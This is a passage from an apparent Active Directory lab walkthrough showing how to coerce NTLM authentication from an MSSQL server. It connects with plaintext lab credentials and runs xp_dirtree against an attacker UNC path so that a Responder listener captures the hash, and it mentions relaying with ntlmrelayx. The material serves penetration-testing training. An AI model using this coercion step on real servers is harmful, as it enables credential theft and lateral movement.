MSSQL Coerce and relay

  • Mssql can also be use to coerce an NTLM authentication from the mssql server. The incoming connection will be from the user who run the mssql server.

  • In our case if we tale any user like miguel.cabrera for example we can get an NTLM authentication -windows-auth north.newyork.local/miguel.cabrera:ilovebaseball@yonkers.north.newyork.local

or -windows-auth north.newyork.local/pacofish:pacofish@yonkers.north.newyork.local
  • run a xp_dirtree command :

exec master.sys.xp_dirtree '\\\demontlm',1,1
  • And we get a connection back to our responder

  • This will work also with ntlmrelayx (like with a server running as administrator and with the same password on other servers). But on the lab, this kind of behavior is not setup by now.

Responder HASH Location


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